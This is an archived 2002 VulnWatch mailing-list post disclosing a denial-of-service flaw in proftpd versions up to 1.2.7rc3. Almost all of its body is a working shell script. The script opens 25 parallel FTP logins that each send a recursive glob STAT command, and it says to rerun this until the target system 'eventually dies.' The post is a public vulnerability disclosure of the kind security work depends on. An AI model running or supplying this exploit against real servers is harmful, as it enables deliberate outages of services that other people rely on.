[VulnWatch] proftpd <=1.2.7rc3 DoS

From: Rob klein Gunnewiek (rmkleingat_private)
Date: Sun Dec 08 2002 - 04:53:57 PST

Next message: dong-h0un U: "Remote multiple vulnerability in apt-www-proxy."

Previous message: advisoriesat_private: "Unchecked buffer in PC-cillin"
Next in thread: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Reply: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Reply: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

proftpd is vulnerable to denial of service similar to the list
*/../*/../*/../*.

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach  -  www.duho.org
#
# use: ./prodos.sh <host> <user> <pass>
# do this some more to make sure the system eventually dies

cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!

#end

Next message: dong-h0un U: "Remote multiple vulnerability in apt-www-proxy."
Previous message: advisoriesat_private: "Unchecked buffer in PC-cillin"
Next in thread: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Reply: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Reply: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Dec 10 2002 - 10:05:52 PST